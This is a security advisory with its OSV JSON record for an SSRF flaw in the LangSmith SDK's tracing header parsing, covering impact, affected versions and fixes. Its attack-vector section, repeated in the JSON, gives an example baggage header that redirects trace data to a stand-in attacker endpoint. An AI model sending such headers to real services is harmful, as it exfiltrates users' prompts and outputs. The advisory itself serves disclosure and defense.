PYSEC-2026-2584
Vulnerability from pysec - Published: 2026-07-13 14:36 - Updated: 2026-07-13 16:04Summary
The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary api_url values through the baggage header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.
Description
When using distributed tracing, the SDK parses incoming HTTP headers via RunTree.from_headers() in Python or RunTree.fromHeaders() in Typescript. The baggage header can contain replica configurations including api_url and api_key fields.
Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's post() and patch() methods send run data to all configured replica URLs, including any injected by an attacker.
Attack Vector
-
Attacker sends an HTTP request to a vulnerable service with a malicious
baggageheader:baggage: langsmith-replicas=[{"api_url":"https://attacker.com/exfil","project_name":"x"}] -
The service parses the header via
RunTree.from_headers(), storing the attacker's URL -
When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to
https://attacker.com/exfil
Impact
- Data Exfiltration: Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers
- SSRF: Ability to make the server send requests to arbitrary URLs, potentially targeting internal services
Affected Use Cases
Applications are vulnerable if they:
- Use TracingMiddleware to automatically propagate tracing context
- Call RunTree.from_headers() / RunTree.fromHeaders() with untrusted HTTP headers
Remediation
Update to the patched versions:
- Python: pip install langsmith>=0.6.3
- JavaScript: npm install langsmith@>=0.4.6
The fix filters incoming replica configurations to an allowlist of safe fields, removing api_url, api_key, and other credential fields.
Workarounds
If unable to upgrade immediately:
- Strip or validate the baggage header before passing to from_headers()
- Do not use TracingMiddleware with untrusted traffic
| Name | purl | langsmith | pkg:pypi/langsmith |
|---|
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "langsmith",
"purl": "pkg:pypi/langsmith"
},
"ranges": [
{
"events": [
{
"introduced": "0.4.10"
},
{
"fixed": "0.6.3"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.4.10",
"0.4.11",
"0.4.12",
"0.4.13",
"0.4.14",
"0.4.15",
"0.4.16",
"0.4.17",
"0.4.18",
"0.4.19",
"0.4.20",
"0.4.21",
"0.4.22",
"0.4.23",
"0.4.24",
"0.4.25",
"0.4.26",
"0.4.27",
"0.4.28",
"0.4.29",
"0.4.30",
"0.4.31",
"0.4.32",
"0.4.32rc0",
"0.4.33",
"0.4.34",
"0.4.35",
"0.4.35rc1",
"0.4.36",
"0.4.37",
"0.4.38",
"0.4.39",
"0.4.39rc0",
"0.4.39rc1",
"0.4.40",
"0.4.41",
"0.4.42",
"0.4.42rc0",
"0.4.43",
"0.4.43rc0",
"0.4.44",
"0.4.45",
"0.4.46",
"0.4.47",
"0.4.48",
"0.4.49",
"0.4.50",
"0.4.51",
"0.4.52",
"0.4.53",
"0.4.54",
"0.4.54rc0",
"0.4.55",
"0.4.56",
"0.4.57",
"0.4.58",
"0.4.59",
"0.4.60",
"0.5.0",
"0.5.1",
"0.5.2",
"0.6.0",
"0.6.0rc0",
"0.6.1",
"0.6.2"
]
}
],
"aliases": [
"CVE-2026-25528",
"GHSA-v34v-rq6j-cj6p"
],
"details": "## Summary\n\nThe LangSmith SDK\u0027s distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary `api_url` values through the `baggage` header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.\n\n---\n\n## Description\n\nWhen using distributed tracing, the SDK parses incoming HTTP headers via `RunTree.from_headers()` in Python or `RunTree.fromHeaders()` in Typescript. The `baggage` header can contain replica configurations including `api_url` and `api_key` fields.\n\nPrior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK\u0027s `post()` and `patch()` methods send run data to all configured replica URLs, including any injected by an attacker.\n\n---\n\n## Attack Vector\n\n1. Attacker sends an HTTP request to a vulnerable service with a malicious `baggage` header:\n ```\n baggage: langsmith-replicas=[{\"api_url\":\"https://attacker.com/exfil\",\"project_name\":\"x\"}]\n ```\n\n2. The service parses the header via `RunTree.from_headers()`, storing the attacker\u0027s URL\n\n3. When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to `https://attacker.com/exfil`\n\n---\n\n## Impact\n\n- **Data Exfiltration:** Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers\n- **SSRF:** Ability to make the server send requests to arbitrary URLs, potentially targeting internal services\n\n---\n\n## Affected Use Cases\n\nApplications are vulnerable if they:\n- Use `TracingMiddleware` to automatically propagate tracing context\n- Call `RunTree.from_headers()` / `RunTree.fromHeaders()` with untrusted HTTP headers\n\n---\n\n## Remediation\n\nUpdate to the patched versions:\n- **Python:** `pip install langsmith\u003e=0.6.3`\n- **JavaScript:** `npm install langsmith@\u003e=0.4.6`\n\nThe fix filters incoming replica configurations to an allowlist of safe fields, removing `api_url`, `api_key`, and other credential fields.\n\n---\n\n## Workarounds\n\nIf unable to upgrade immediately:\n- Strip or validate the `baggage` header before passing to `from_headers()`\n- Do not use `TracingMiddleware` with untrusted traffic",
"id": "PYSEC-2026-2584",
"modified": "2026-07-13T16:04:34.488928Z",
"published": "2026-07-13T14:36:35.362216Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-v34v-rq6j-cj6p"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25528"
},
{
"type": "PACKAGE",
"url": "https://github.com/langchain-ai/langsmith-sdk"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/langsmith"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-v34v-rq6j-cj6p"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "LangSmith Client SDK Affected by Server-Side Request Forgery via Tracing Header Injection"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.